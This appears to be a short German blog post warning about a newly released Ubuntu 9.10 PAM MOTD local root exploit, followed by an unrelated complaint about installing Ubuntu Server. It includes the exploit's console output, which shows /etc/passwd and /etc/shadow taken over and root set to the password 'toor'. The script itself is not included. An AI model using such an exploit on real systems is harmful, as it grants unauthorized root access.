Ubuntu PAM MOTD Local Root Exploit

Sag ich ja nur, kam gestern raus. Also wer tatsaechlich Ubuntu Produktiv nutzt sollte besser updaten.

#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
#   [*] Ubuntu PAM MOTD local root
#   [*] Backuped /home/user/.ssh/authorized_keys
#   [*] SSH key set up
#   [*] Backuped /home/user/.cache
#   [*] spawn ssh
#   [+] owned: /etc/passwd
#   [*] spawn ssh
#   [+] owned: /etc/shadow
#   [*] Restored /home/user/.cache
#   [*] Restored /home/user/.ssh/authorized_keys
#   [*] SSH key removed
#   [+] Success! Use password toor to get root
#   Password:
#   root@ubuntu:/home/user# id
#   uid=0(root) gid=0(root) groupes=0(root)

getestet mit 9.10

Eigentlich wollte ich ja

Ubuntu Server eine Chance geben. Dafuer sollte ein PE 1855 herhalten. Leider war die Installation eine Katastrophe, besonders die Partitionierung (zeigte einfach ein Dutzend seltsamer Partitionen an). Mit Debian hat der ganze Vorgang so 15 Minuten gedauert, ohne ein einziges Problem und das System war am laufen.